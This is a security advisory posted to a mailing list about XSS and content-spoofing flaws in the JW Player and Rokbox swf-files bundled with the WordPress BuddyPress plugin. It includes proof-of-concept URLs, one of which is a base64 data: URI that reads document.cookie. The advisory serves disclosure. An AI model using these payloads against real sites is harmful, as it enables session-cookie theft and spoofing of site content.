WordPress BuddyPress Cross Site Scripting / Content Spoofing

`Hello list!  
  
I want to warn you about multiple security vulnerabilities in plugin   
BuddyPress for WordPress. I've disclosed vulnerabilities in JW Player in   
June and August (including in commercial version JW Player Pro) and   
disclosed vulnerabilities in Rokbox in December. And BuddyPress uses this   
software, so it has the same vulnerabilities.  
  
These are Content Spoofing and Cross-Site Scripting and vulnerabilities.   
Different versions of BuddyPress use different versions of swf-files, but in   
total we have such installations of BuddyPress: with JWPlayer 5.5.1641, with   
JWPlayer 4.2.95, with Rokbox with JW Player 4.4.198 (in rt_affinity_wp   
theme). There are small amount of web sites with these swf-files, so it can   
be old versions or some rare versions of BuddyPress. There are many other   
vulnerabilities in this WP plugin and later I'll write about them.  
  
-------------------------  
Affected products:  
-------------------------  
  
Vulnerable are versions of BuddyPress with JWPlayer or with Rokbox with   
JWPlayer.  
  
----------  
Details:  
----------  
  
For JWPlayer 5.5.1641 the path is   
http://site/wp-content/plugins/buddypress/bp-themes/bp-default/jwplayer/player.swf  
  
For JWPlayer 4.2.95 the path is   
http://site/wp-content/plugins/buddypress/bp-themes/file/player.swf  
  
For JWPlayer 4.4.198 in theme rt_affinity_wp for BuddyPress (it's   
third-party theme) the path is   
http://site/wp-content/plugins/buddypress/bp-themes/rt_affinity_wp-bp12/js/rokbox/jwplayer/jwplayer.swf.  
  
XSS (WASC-08):  
  
http://site/wp-content/plugins/buddypress/bp-themes/bp-default/jwplayer/player.swf?playerready=alert(document.cookie)  
  
In 5.x versions of JW Player there are this XSS and other vulnerabilities   
(http://securityvulns.ru/docs28176.html). In 4.x versions of JW Player there   
are only the next holes.  
  
Content Spoofing (WASC-12):  
  
In parameter file there can be set as video, as audio files.  
  
Swf-file of JW Player accepts arbitrary addresses in parameters file and   
image, which allows to spoof content of flash - i.e. by setting addresses of   
video (audio) and/or image files from other site.  
  
http://site/wp-content/plugins/buddypress/bp-themes/file/player.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF  
http://site/wp-content/plugins/buddypress/bp-themes/file/player.swf?file=1.flv&image=1.jpg  
  
Content Spoofing (WASC-12):  
  
Swf-file of JW Player accepts arbitrary addresses in parameter config, which   
allows to spoof content of flash - i.e. by setting address of config file   
from other site (parameters file and image in xml-file accept arbitrary   
addresses). For loading of config file from other site it needs to have   
crossdomain.xml.  
  
http://site/wp-content/plugins/buddypress/bp-themes/file/player.swf?config=1.xml  
  
1.xml  
  
<config>  
<file>1.flv</file>  
<image>1.jpg</image>  
</config>  
  
Content Spoofing (WASC-12):  
  
http://site/wp-content/plugins/buddypress/bp-themes/file/player.swf?abouttext=Player&aboutlink=http://site  
  
XSS (WASC-08):  
  
http://site/wp-content/plugins/buddypress/bp-themes/file/player.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B  
  
------------  
Timeline:  
------------   
  
2012.05.29 - informed developers of JW Player.  
2012.06.06 - disclosed at my site about JW Player.  
2012.08.18 - informed developers about new holes in JW Player Pro.  
2012.08.23 - disclosed at my site about JW Player Pro.  
2012.08.28 - informed developers of Rokbox.  
2012.12.14 - disclosed at my site about Rokbox.  
2012.12.20 - disclosed to the lists about BuddyPress.  
  
Best wishes & regards,  
MustLive  
Administrator of Websecurity web site  
http://websecurity.com.ua   
  
`